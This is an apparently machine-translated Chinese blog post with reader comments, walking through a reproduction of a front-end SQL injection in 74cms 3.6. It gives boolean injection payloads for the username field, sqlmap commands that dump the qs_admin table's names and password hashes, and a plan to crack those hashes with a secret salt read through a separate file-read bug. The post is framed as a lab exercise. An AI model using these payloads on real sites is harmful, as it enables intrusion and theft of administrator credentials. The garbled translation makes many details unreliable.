近日,74cms V4。2.3任意文件下载漏洞,本来想尝试和74cms 3。然后6接待SQL注入漏洞,其中较小的值QS_pwdhash合并被拆除MD5碰撞,但任意文件下载漏洞不会影响74cms 3.6,所以它必须首先重新注入漏洞在前台现下。

实验任务:

1。重现74cms 3.6接收SQL注入漏洞。
2。尝试使用Python在数据库中自动获取数据。

实验工具:



1。PHPstudy
2.74cms 3.6来源(在文本的末尾提供了下载链接)
3。Python的2.7


漏洞再生产过程:


0×01 下载74cms 3.6并安装,安装成功后可以访问安装成功。




0×02 注入点出现在用户名参数。

当下面的信息不存在由于用户的用户名POST请求,使得虚假的提示。




结构“或” 1“=” 2个提示请求假

POST DATA:用户名= a‘or ’1‘=“2 ACT = get_pass_check




结构“或” 1“=” 1个提示,要求真

POST DATA:用户名= a’or ‘1’=“1&ACT = get_pass_check





×03 用户名参数在上述请求确定,并且本发明的注射是利用打嗝套件击倒布尔百叶窗和保存该分组REQ。文本。






0×04 使用>的SqlMap。PY -r REQ。TXT --current-DB命令来获得当前数据库信息的名称。






0×05 由于源代码是公开的,所以它从名称中已知相应的数据库表,使用下面的命令来取回帐号密码信息

> E:\的SqlMap>的SqlMap。PY -r REQ。TXT --current-DB -T qs_admin -C ADMIN_NAME,PWD,pwd_hash --dump






0×06 最近发布的74cms V4.2。3招待会任意文件读取漏洞已想借此钻了空子来获取/数据/配置。在PHP $ QS_pwdhash价值,但遗憾的是这种漏洞不会影响74cms 3。第6版。为什么应该得到$ QS_pwdhash?PWD因为在代码字段中的值存储在数据库中的MD5($ admin_pwd。$ Pwd_hash。$ QS_pwdhash)的产生,目前已知的PWD,pwd_hash,如果你知道QS_pwdhash的价值可以通过与明文密码碰撞的方式获得,虽然没有一点点的乐趣,但为了能够让一些全文(共似乎并不低哈哈?),盲目使用PY实现这一点,虽然也SQLMAP用完了,我还以为他们很容易编程时。




0×07 写用于运行数据,当然,这是在写一个脚本改变时的惯常做法已成,所以我们推荐了很多积累自己写剧本,当你想用它来改变下像一个粗糙的脚本模板,写这个模板的原稿时是注入更方便地写,因为可能负载写在共同的,从而使得传入变量,你可以直接写SQL语句,感觉方便使用标准化查询。

[SQL]







小总结:

脆弱的部分复制很简单,我相信我们能做到这一点,所以我们可以尝试把重点放在如何更好地使用Python是盲目的在这个问题上,我重视的是自己写的代码,欢迎大家一起交流思想和写作计划。


下载源代码和脚本:

链接:密码:kqdr









正则表达式是MySQL中的常规 表姐
你的意思是这个有效载荷。什么是正则表达式中的作用
有效载荷= “(选择(” + SQLI + “)的正则表达式二进制 ‘^%S’)” %(X)
ECSHOP最新版本的漏洞某处读取任何文件(或不发送0天?)[变形]

学习中注入注入 学习中注入注入 接待SQL注入+ Python脚本稍加练习 再看一下节奏
了解注射 PY-手玩 研究下载源代码,谢谢你的分享。 看这里。 路过看看 下载源代码和脚本:
我想站源码 PY大法好! 好东西,谢谢楼主!!!!!!!!!!!!!
感谢分享
?从JD =

本文链接:74cms 3.6 前台SQL注入+Python脚本小练习

您可能也会喜欢

友情链接:

大悲咒注音 心经唱诵 经文